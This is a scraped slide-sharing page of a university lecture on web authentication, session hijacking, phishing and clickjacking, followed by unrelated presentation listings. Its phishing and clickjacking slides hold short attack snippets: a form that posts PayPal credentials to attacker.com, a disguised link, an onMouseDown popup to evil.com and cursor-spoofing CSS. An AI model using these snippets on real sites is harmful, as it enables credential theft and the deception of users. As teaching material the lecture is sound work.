web security authentication ui based attacks
play

Web Security: Authentication & UI-based attacks CS 161: - PowerPoint PPT Presentation

Apr 09, 2023 •374 likes •1.11k views

Web Security: Authentication & UI-based attacks CS 161: Computer Security Prof. Raluca Ada Popa April 12, 2016 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh Authentication &

  1. Web Security: Authentication & UI-based attacks CS 161: Computer Security Prof. Raluca Ada Popa April 12, 2016 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh

  2. Authentication & Impersonation

  3. Authentication Verifying someone really is who they say they claim they are Web server should authenticate client Client should authenticate web server

  4. Impersonation Pretending to be someone else Attacker can try to: n Impersonate client n Impersonate server

  5. Authenticating users How can a computer authenticate the user? n “Something you know” w e.g., password, PIN n “Something you have” w e.g., smartphone, ATM card, car key n “Something you are” w e.g., fingerprint, iris scan, facial recognition

  6. Recall: two-factor authentication Authentication using two of: n Something you know (account details or passwords) n Something you have (tokens or mobile phones) n Something you are (biometrics)

  7. Example Is this a good example of 2FA? Online banking: n Hardware token or card (“smth you have”) n Password (“smth you know”) Mobile phone two-factor authentication: - Password (“smth you know”) - Code received via SMS (“smth you have”) Email authentication: Password Answer to security question This is not two-factor authentication because both of the factors are something you know

  8. After authenticating.. Session established n Session ID stored in cookie n Web server maintains list of active sessions (sessionID mapped to user info) Reauthentication happens on every http request automatically n Recall that every http request contains cookie

  9. After authenticating.. Alice Server sessionID = Active sessions: 3458904043 sessionID | name 3458904043 | Alice Must be unpredictable 5465246234 | Bob Session hijacking attack: • Attacker steals sessionID, e.g., using a packet sniffer • Impersonates user

  10. After authenticating.. Alice Server sessionID = Active sessions: 3458904043 3458904043 | Alice 5465246234 | Bob Must be unpredictable Protect sessionID from packet sniffers: • Send encrypted over HTTPS • Use secure flag to ensure this When should session/cookie expire? • Often is more secure • But less usable for user Other flags? • httponly to prevent scripts from getting to it

  11. After authentication .. Alice Server sessionID = Active sessions: 3458904043 3458904043 | Alice 5465246234 | Bob Must be unpredictable What if attacker obtains old sessionID somehow? • When user logs out, server must remove Alice’s entry from active sessions • Server must not reuse the same session ID in the future • Old sessionID will not be useful

  12. Authenticating the server What mechanism we learned about that helps prevent an attacker from impersonating a server? Digital certificates (assuming CA or relevant secret keys were not compromised) But these only establish that a certain host a user visits has a certain public key. What if the user visits a malicious host?

  13. Phishing attack Attacker creates fake website that appears similar to a real one Tricks user to visit site (e.g. sending email) User inserts credentials and sensitive data which gets sent to attacker Web page then directs to real site or shows maintenance issues

  14. http://paypal.attacker.com/ <form action="http://attacker.com/paypal.php" method="post" name=Date>

  15. http://ebay.attacker.com/

  16. http://ebay.attacker.com/

  17. http://ebay.attacker.com/

  18. http://ebay.attacker.com/

  19. http://ebay.attacker.com/

  20. Phishing prevention User should check URL they are visiting! http://ebay.attacker.com/

  21. Does not suffice to check what it says you click on Now go to Google! http://google.com Because it can be: <a src=“http://attacker.com”>http://google.com</a> Check the address bar!

  22. URL obfuscation attack Attacker can choose similarly looking URL with a typo bankofamerca.com bankofthevvest.com

  23. Homeograph attack - Unicode characters from international alphabets may be used in URLs p aypal.com (first p in Cyrillic) - URL seems correct, but is not Another example: www.pnc.com⁄webapp⁄unsec⁄homepage.var.cn "pnc.com⁄webapp⁄unsec⁄homepage” is one string

  24. Phishing prevention User should check URL! n Carefully!

  25. “Spear Phishing” Targeted phishing that includes details that seemingly must mean it’s legitimate

  26. Yep, this is itself a spear-phishing attack!

  27. Sophisticated phishing Context-aware phishing – 10% users fooled n Spoofed email includes info related to a recent eBay transaction/listing/purchase Social phishing – 70% users fooled n Send spoofed email appearing to be from one of the victim’s friends (inferred using social networks) West Point experiment n Cadets received a spoofed email near end of semester: “ There was a problem with your last grade report; click here to resolve it .” 80% clicked .

  28. Why does phishing work? User mental model vs. reality n Browser security model too hard to understand! The easy path is insecure; the secure path takes extra effort Risks are rare

  29. Authenticating the server Users should: n Check the address bar carefully. Or, load the site via a bookmark or by typing into the address bar. n Guard against spam n Do not click on links, attachments from unknown Browsers also receive regular blacklists of phishing sites (but this is not immediate) Mail servers try to eliminate phishing email

  30. Authentication summary • We need to authenticate both users and servers • Phishing attack impersonates server • A disciplined user can reduce occurrence of phishing attacks

  31. UI-based attacks

  32. Clickjacking attacks Exploitation where a user’s mouse click is used in a way that was not intended by the user

  33. Talk to your partner How can a user’s click be used in a way different than intended?

  34. Simple example <a <a onMouseDown onMouseDown=window.open window.open(http://www.evil.com http://www.evil.com) href href=http://www.google.com http://www.google.com/> /> Go to Google</a> Go to Google</a> What does it do? Opens a window to the attacker site Why include href to Google? Browser status bar shows URL when hovering over as a means of protection

  35. Recall: Frames A frame is used to embed another document within the current HTML document Any site can frame another site The <iframe> tag specifies an inline frame

  36. Example HTML page <iframe src=“http://www.google.com/”> </iframe> UI rendering framing page/ framed page/ outer page inner page 36

  37. Frames Outer page can set frame width, height But then, only framed site can draw in its own rectangle Modularity n Brings together code from different sources

  38. What happens in this case? Funny cats website JavaScript secret secret

  39. Frames: same-origin policy Frame inherits origin of its URL Same-origin policy: if frame and outer page have different origins, they cannot access each other n In particular, malicious JS on outer page cannot access resources of inner page

  40. How to bypass same-origin policy for frames? Clickjacking

  41. Clickjacking using frames Evil site frames good site Evil site covers good site by putting dialogue boxes or other elements on top of parts of framed site to create a different effect Inner site now looks different to user

  42. Compromise visual integrity – target Hiding the target Partial overlays $0.15 $0.15 Click

  43. UI Subversion: Clickjacking An attack application (script) compromises the context integrity of another application’s User Interface when the user acts on the UI Visual integrity Context integrity consists of Target is visible visual integrity + temporal integrity Pointer is visible 1. Target checked 2. Initiate click 3. Target clicked Temporal integrity Target clicked = Target checked Pointer clicked = Pointer checked

  44. Compromise visual integrity – target Hiding the target Partial overlays $0.15 $0.15 Click

  45. Compromise visual integrity – pointer: cursorjacking Can customize cursor! • CSS example: #mycursor { cursor: none; width: 97px; height: 137px; background: url("images/custom-cursor.jpg") } Javascript can keep updating cursor, can display shifted cursor • Fake cursor, but more visible Real cursor

  46. Compromise visual integrity – pointer: cursorjacking Cursorjacking deceives a user by using a custom cursor image, where the pointer was displayed with an offset Download .exe Fake, but more visible real

  47. Clickjacking to Access the User’s Webcam Fake cursor Real cursor

  48. Sitekeys • Some sites use/used a secret image to identify site to user (e.g., Bank of America) • only good site should know the secret image • user should check that they receive the correct image Invented by Berkeley grad student! Not really used much now, not • What is it aimed to protect against? considered effective mostly because • phishing attacks users ignore these images and don’t remember what the image was for each site

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User Authentication Authentication process Means of authentication Passwords Vulnerabilities of passwords Password Cracking Dictionary Attacks

471 views • 21 slides
Defeating TLS client authentication using fault attacks Who are we ? R&amp;D dept. @

Defeating TLS client authentication using fault attacks Who are we ? R&amp;D dept. @

Defeating TLS client authentication using fault attacks Who are we ? R&amp;D dept. @ Security Evaluation Kudelski Security Lab @ Kudelski IoT Embedded systems Hardware attacks security research Glitch / EM Reverse

889 views • 51 slides
Security Overview Different aspects of security User authentication Protection mechanisms

Security Overview Different aspects of security User authentication Protection mechanisms

CS399 New Beginnings Jonathan Walpole Security Overview Different aspects of security User authentication Protection mechanisms Attacks: - trojan horses, spoofing, logic bombs, trap doors, buffer overflow attacks, viruses, worms, mobile

825 views • 59 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

458 views • 18 slides
Security Security as term, Possible Security violations Authentication Criteria for

Security Security as term, Possible Security violations Authentication Criteria for

BS1 WS19/20 topic-based slides Security Security as term, Possible Security violations Authentication Criteria for Trust in Computer Systems Three hearts of Windows Security DACLs A Look at Security System is secure if

988 views • 20 slides
1 Cryptography basics Secret-key encryption Algorithms (E, D) are widely known Also

1 Cryptography basics Secret-key encryption Algorithms (E, D) are widely known Also

Security The security environment Basics of cryptography User authentication Chapter 9: Security Attacks from inside the system Attacks from outside the system Protection mechanisms Trusted systems CS 1550, cs.pitt.edu

538 views • 11 slides
Authentication Most technical security safeguards have Authentication authentication as a

Authentication Most technical security safeguards have Authentication authentication as a

Authentication Most technical security safeguards have Authentication authentication as a precondition How to authenticate: Something you know Password, Secrets Something you have Smart Card, Token Something you are Biometrie

607 views • 4 slides
HOST PUF-Based Authentication ECE 525 PUF-Based Authentication PUF-based protocols have been

HOST PUF-Based Authentication ECE 525 PUF-Based Authentication PUF-based protocols have been

HOST PUF-Based Authentication ECE 525 PUF-Based Authentication PUF-based protocols have been proposed for applications including: Encryption and authentication For detecting malicious alterations of design components For

645 views • 15 slides
Transcript collision Attacks Breaking Authentication in TLS, IKE, and SSH G. Leurent, K.

Transcript collision Attacks Breaking Authentication in TLS, IKE, and SSH G. Leurent, K.

Introduction Client Authentication Downgrade Attack Channel Binding Conclusion Transcript collision Attacks Breaking Authentication in TLS, IKE, and SSH G. Leurent, K. Bhargavan (Inria) Transcript collision Attacks Dagstuhl 16012 1 / 20

370 views • 33 slides
Chapter 9: Security Security The security environment Basics of cryptography User

Chapter 9: Security Security The security environment Basics of cryptography User

Chapter 9: Security Security The security environment Basics of cryptography User authentication Attacks from inside the system Attacks from outside the system Protection mechanisms Trusted systems Chapter 9: Security

801 views • 65 slides
Yasser F. O. Mohammad 2010.2.23 REMINDER 1: Active Attacks Masquerade Modification Replay DoS

Yasser F. O. Mohammad 2010.2.23 REMINDER 1: Active Attacks Masquerade Modification Replay DoS

Yasser F. O. Mohammad 2010.2.23 REMINDER 1: Active Attacks Masquerade Modification Replay DoS REMINDER 2: Security Services in X.800 Authentication 1. Pear entity authentication Data origin authentication Access Control 2.

618 views • 13 slides
On the Usability and Security of Password-Based User Authentication Maximilian Golla Thesis

On the Usability and Security of Password-Based User Authentication Maximilian Golla Thesis

On the Usability and Security of Password-Based User Authentication Maximilian Golla Thesis Defense, Bochum, Germany, May 29, 2019 User Authentication Competing requirements of security and usability . [1] Common Factors: Knowledge ( Password ,

619 views • 34 slides
AUTHENTICATION AUTHENTICATION Authentication is the process by which you decide that someone is

AUTHENTICATION AUTHENTICATION Authentication is the process by which you decide that someone is

SECURITY TOPICS PART 2 AUTHENTICATION AUTHENTICATION Authentication is the process by which you decide that someone is who they say they are and therefore permitted to access the requested resources: getting entrance to a computer lab

833 views • 44 slides
HOST PUF-Based Authentication Protocols ECE 525 PUF-Based Authentication Protocols The simplest

HOST PUF-Based Authentication Protocols ECE 525 PUF-Based Authentication Protocols The simplest

HOST PUF-Based Authentication Protocols ECE 525 PUF-Based Authentication Protocols The simplest mechanisms called challenge-response entity authentication exchange cleartext bitstrings directly, i.e., no cryptographic primitives are used A PUF

1.08k views • 38 slides
Security II: Web authentication Such text-based protocols can be demonstrated via generic TCP

Security II: Web authentication Such text-based protocols can be demonstrated via generic TCP

Hyper Text Transfer Protocol (HTTP) version 0.9 With HTTP, a client (web browser) contacts a server on TCP port 80, sends a request line and receives a response file. Security II: Web authentication Such text-based protocols can be

383 views • 7 slides
Web Security: 1) UI-based attacks 2) Tracking on the web CS 161: Computer Security Prof. Raluca

Web Security: 1) UI-based attacks 2) Tracking on the web CS 161: Computer Security Prof. Raluca

Web Security: 1) UI-based attacks 2) Tracking on the web CS 161: Computer Security Prof. Raluca Ada Popa November 15, 2016 Contains new slides, slides from past CS 161 offerings and slides from Dan Boneh Announcements Last core lecture,

2.06k views • 100 slides
Ardui-no pown Android A. Cervoise antoine.cervoise@gmail.com July 6, 2016 RMLL Sec 2016 1 / 33

Ardui-no pown Android A. Cervoise antoine.cervoise@gmail.com July 6, 2016 RMLL Sec 2016 1 / 33

Ardui-no pown Android A. Cervoise antoine.cervoise@gmail.com July 6, 2016 RMLL Sec 2016 1 / 33 Summary Powning Android Arduino Enable mode debug Install APK Conclusion RMLL Sec 2016 2 / 33 Attacks against Android Interesting here

816 views • 33 slides
POAD: The Process Instructor: Dr. Hany H. Ammar Dept. of Computer Science and Electrical

POAD: The Process Instructor: Dr. Hany H. Ammar Dept. of Computer Science and Electrical

POAD Book: Chapter 7 POAD: The Process Instructor: Dr. Hany H. Ammar Dept. of Computer Science and Electrical Engineering, WVU Goals Pattern Integration: Present two different ways for gluing patterns To introduce the process aspects

762 views • 28 slides
!&quot;#!$ n

!&quot;#!$ n

!&quot;#!$ n %&amp;!$!'(&amp;!)!!!*

200 views • 3 slides
A diagrammatic approach to information flow in encrypted communication Z p Peter M. Hines Z p Z p

A diagrammatic approach to information flow in encrypted communication Z p Peter M. Hines Z p Z p

A diagrammatic approach to information flow in encrypted communication Z p Peter M. Hines Z p Z p Y.C.C.S.A. ,

780 views • 39 slides
The Future Needs Everyone: Promoting Workplace Success for Millennials with Disabilities will

The Future Needs Everyone: Promoting Workplace Success for Millennials with Disabilities will

1/17/2017 The Future Needs Everyone: Promoting Workplace Success for Millennials with Disabilities will begin at 2 pm ET Listening to the Webinar Online: Please make sure your computer speakers are turned on or your headphones are

389 views • 24 slides
01 Introduction CS 2043: Unix Tools and Scripting, Spring 2019 [1] Matthew Milano January

01 Introduction CS 2043: Unix Tools and Scripting, Spring 2019 [1] Matthew Milano January

01 Introduction CS 2043: Unix Tools and Scripting, Spring 2019 [1] Matthew Milano January 23, 2019 Cornell University 1 Table of Contents 1. Welcome 2. Why are you here? 3. The command line feels unapproachable. But it doesnt have

413 views • 12 slides
SEEKING GOD TOGETHER INTRODUCTORY POWERPOINT OVERVIEW OF EACH SLIDE WITH SPEAKER NOTES 1. Front

SEEKING GOD TOGETHER INTRODUCTORY POWERPOINT OVERVIEW OF EACH SLIDE WITH SPEAKER NOTES 1. Front

SEEKING GOD TOGETHER INTRODUCTORY POWERPOINT OVERVIEW OF EACH SLIDE WITH SPEAKER NOTES 1. Front Cover image SGT is a resource for the Pastoral Accompaniment of Families - The clue is in the Title and the picture We are SEEKING GOD TOGETHER

213 views • 9 slides
Andes: A case study Sasikumar M C-DAC Mumbai About Andes Domain: College physics. Quantitative

Andes: A case study Sasikumar M C-DAC Mumbai About Andes Domain: College physics. Quantitative

Andes: A case study Sasikumar M C-DAC Mumbai About Andes Domain: College physics. Quantitative problems. For students of naval academy. Only help with homework so need to change the curricula or teaching strategy for adoption. Provides a

808 views • 38 slides

More recommend